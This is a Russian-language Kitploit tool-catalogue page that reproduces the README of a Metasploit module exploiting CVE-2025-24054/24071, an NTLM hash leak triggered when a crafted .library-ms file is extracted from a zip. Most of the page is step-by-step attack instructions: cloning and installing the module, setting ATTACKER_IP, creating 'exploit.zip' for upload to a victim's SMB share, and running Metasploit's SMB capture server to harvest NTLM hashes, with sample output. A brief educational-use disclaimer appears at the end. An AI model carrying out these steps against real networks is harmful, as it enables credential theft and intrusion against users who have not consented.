Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-24054-24071---Metasploit-Module — Модуль Metasploit для эксплуатации CVE-2025-24054 (ex 24071). Эксплойт утечки NTLM, встроенный в Metasploit, для векторов атак на основе библиотек Windows. | Kitploit
Инструменты/GitHubGitHub/securitylayer404/cve-2025-24054-24071---metasploit-module
Фреймворки для эксплойтовГенерация полезной нагрузкиЭксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеRed Teaming
GitHubsecuritylayer404/cve-2025-24054-24071---metasploit-module

CVE-2025-24054-24071---Metasploit-Module

Модуль Metasploit для эксплуатации CVE-2025-24054 (ex 24071). Эксплойт утечки NTLM, встроенный в Metasploit, для векторов атак на основе библиотек Windows.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
4 месяцев назадЕщё не проверено

CVE-2025-24054/24071 - Модуль Metasploit

Обзор

Уязвимость возникает в процессе распаковки файла .zip. При взаимодействии со специально созданным файлом .library-ms проводник Windows обрабатывает внутреннюю XML-схему и автоматически инициирует SMB-запрос аутентификации к удалённому пути, контролируемому атакующим.

Это поведение позволяет перехватить NTLM-хэш пользователя без какого-либо дополнительного взаимодействия, кроме распаковки файла. Чтобы посмотреть proof-of-concept, рекомендую перейти по ссылке: Fluffy - HTB.

⚠️ Важное примечание:

Хотя изначально эта уязвимость распространялась как CVE-2025-24071, в настоящее время она официально отслеживается как CVE-2025-24054.

📌 Установка

Клонируйте репозиторий:

root@kitploit:~
❯ git clone https://github.com/SecurityLayer404/CVE-2025-24054-24071---Metasploit-Module.git
❯ cd CVE-2025-24071

Скопируйте модуль в каталог Metasploit:

root@kitploit:~
❯ cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/

Если каталог не существует, создайте его:

root@kitploit:~
❯ mkdir -p ~/.msf4/modules/auxiliary/server/

Затем снова скопируйте модуль.

📌 Использование

Запустите Metasploit и загрузите модуль:

root@kitploit:~
❯ msfconsole -q
❯ use auxiliary/server/ntlm_hash_leak

Если модуль загрузился успешно, вы увидите настройки для его конфигурации:

root@kitploit:~
❯ show options

Module options (auxiliary/server/ntlm_hash_leak):

   Name          Current Setting       Required  Description
   ----          ---------------       --------  -----------
   ATTACKER_IP                         yes       IP атакующего (где запущен Responder/Impacket)
   FILENAME      exploit.zip           yes       Имя ZIP-файла
   LIBRARY_NAME  documents.library-ms  yes       Имя файла .library-ms
   SHARE_NAME    recurso               yes       Имя фиктивного общего ресурса

Настройте модуль и выполните:

root@kitploit:~
❯ set ATTACKER_IP 0.0.0.0  # Замените на ваш IP атакующего

❯ set FILENAME exploit.zip  # Имя полезной нагрузки, которую вы загрузите на SMB (целевая машина)

❯ set LIBRARY_NAME malicious.library-ms  # Имя файла .library-ms

❯ set SHARE_NAME it_shared  # Имя SMB-ресурса

❯ run

Результат: модуль создаёт файл .zip, который необходимо загрузить на целевой SMB-сервер для последующего выполнения жертвой

root@kitploit:~
[+] exploit.zip stored at /home/user/.msf4/local/exploit.zip
[+] Архив сохранён: /home/user/.msf4/local/exploit.zip
[*] Auxiliary module execution completed

Наконец, используйте модуль захвата SMB из Metasploit для получения NTLM-хэшей:

root@kitploit:~
❯ use auxiliary/server/capture/smb
❯ set SRVHOST 0.0.0.0  # Замените на ваш IP атакующего
❯ run

Если у вас возникли проблемы с запуском SMB-сервера из Metasploit:

  • Запустите msfconsole от root
  • Убедитесь, что файл ntlm_hash_leak.rb имеет соответствующие права доступа для root

⚠️ Предупреждение

Этот модуль разработан исключительно в образовательных целях и для проведения авторизованных тестов. Несанкционированное использование подобных инструментов может быть незаконным.

🕷 Автор

Security Layer

Скачать инструмент